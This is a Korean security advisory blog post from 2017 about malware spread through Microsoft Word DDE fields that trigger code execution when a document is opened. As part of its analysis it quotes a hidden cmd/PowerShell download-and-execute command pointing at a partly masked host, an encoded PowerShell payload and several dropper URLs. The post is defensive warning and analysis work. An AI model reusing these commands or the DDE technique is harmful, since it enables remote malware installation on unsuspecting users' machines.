Microsoft Word 필드 기능을 이용한 악성코드 유포 주의 (2017.10.20)

최근 해외에서 Microsoft Office Word 프로그램에서 제공하는 필드(Field) 기능을 이용하여 단순히 Word 문서를 오픈할 경우 자동으로 악성코드 실행이 가능하도록 하는 방법이 공개되었습니다.

 

• PDF 문서를 이용한 Locky 랜섬웨어 유포 주의 (2017.5.13)

• 샌드박스(Sandbox) 자동 분석 환경을 우회할 수 있는 Locky 랜섬웨어(.lukitus) 유포 정보 (2017.9.11)

 

취약점(Exploit) 방식이 아닌 방법으로 지금까지 가장 대표적인 Word 문서를 이용한 악성코드 감염 방식은 문서를 오픈한 후 사용자가 매크로(Macro) 기능을 활성화해줘야 가능하였습니다.

 

하지만 이번에는 다음과 같은 메시지 창 클릭만으로 자동 실행이 된다는 점에서 악성코드 유포에 사용되기 시작하였으므로 감염 과정을 간단하게 살펴보도록 하겠습니다.

 

MS Word 프로그램에서는 서로 다른 애플리케이션끼리 데이터와 메모리를 교환하는데 사용되는 Dynamic Data Exchange (DDE) 프로토콜을 사용할 수 있는 필드(Field) 기능을 통해 외부의 특정 코드를 다운로드하여 실행할 수 있도록 악용할 수 있는 방법이 공개되었습니다.

 

예를 들어 메일에 첨부된 Word 문서(.doc)를 다운로드하거나 메일에 포함된 링크를 통해 특정 웹 사이트에 접속하여 다운로드한 Word 문서를 오픈할 경우 다음과 같은 메시지 창이 생성될 수 있습니다.

 

 

이 문서에는 다른 파일을 참조하는 필드가 들어 있습니다. 이 문서에서 해당 필드를 업데이트하시겠습니까?

어떠한 보안 경고창 생성없이 필드 업데이트 메시지 창이 생성될 수 있으며, 필드(Field) 기능 자체는 정상 기능이므로 사용자가 업데이트를 허용할 수 있을 것입니다.

 

 

원격 데이터(k powershell -NoP -sta -NonI -w hidden)를 액세스할 수 없습니다. 응용 프로그램 C:\Windows\System32\cmd.exe을(를) 실행하시겠습니까?

이후 원격 데이터에 접근할 수 없다면서 CMD 모드를 실행하도록 사용자에게 요구하고 있으며, 만약 사용자가 예(Y)를 클릭할 경우 다음과 같은 숨은 코드가 실행됩니다.

 

C:\Windows\System32\cmd.exe /k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('h**p://accessyouraudience.com/hjergf**');powershell -e $e

 

 

C:\Windows\System32\cmd.exe에서 k powershell -NoP -sta -NonI -w hidden 에 대한 데이터를 가져올 수 없습니다.

마지막 메시지에서는 CMD 모드에서 원격 데이터를 가져올 수 없다는 메시지가 표시되지만 앞서 실행한 CMD 모드를 통해 다음과 같은 특정 웹 사이트 접속을 통해 코드를 받아와 PowerShell 기능을 통해 코드가 실행될 수 있습니다.

 

 

연결된 웹 사이트에 존재하는 코드를 읽은 후 PowerShell 기능을 통해 다음과 같은 코드가 실행됩니다.

 

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JAB1AHMAIAA9ACAAIgBoAH ~ <생략> ~ ANAAoACQANAAoAfQANAAoA

난독화된 코드를 복호화해보면 다음과 같은 총 5개의 URL 주소에 접속하여 파일 다운로드를 시도할 수 있습니다.

 

• h**p://deltasec.net/jnoiu*****

• h**p://pac-provider.com/jnoiu*****

• h**p://arkberg-design.fi/jnoiu*****

• h**p://basedow-bilder.de/jnoiu*****

• h**p://hair-select.jp/jnoiu*****

 

이 중에서 테스트 당시에는 다음과 같은 일본(Japan) 서버에서 실행 파일(.exe)을 다운로드되는 것을 확인할 수 있었습니다.

 

 

다운로드된 악성 파일은 임시 폴더(%Temp%\12.exe) 파일로 생성되어 실행될 수 있으며, 해당 파일은 Locky 랜섬웨어(.asasin) 또는 금융 정보를 노리는 Trickbot 계열의 악성코드일 수 있습니다.

 

• 12.exe (SHA-1 : 839a0ef54024dcfcbfbcecb0adf3bf0de1aa98da) - Kaspersky : Trojan-Banker.Win32.NeutrinoPOS.hy

 

참고로 테스트 당시에는 Trickbot 악성코드가 다운로드 되었으며, 지속적으로 악성코드 종류는 변경될 수 있습니다.

 

 

악성코드 유포에 사용된 문서를 오픈한 경우 위와 같이 아무런 콘텐츠가 표시되지 않고 있지만 자세하게 확인해보면 보이지 않는 필드에 삽입되어 있는 것을 알 수 있습니다.

 

그러므로 메일에 첨부된 Word 문서 또는 인터넷 상에서 다운로드한 문서를 오픈할 경우 필드 업데이트 창이 뜬다면 함부로 허용하여 악성코드 감염이 이루어지지 않도록 주의하시기 바랍니다.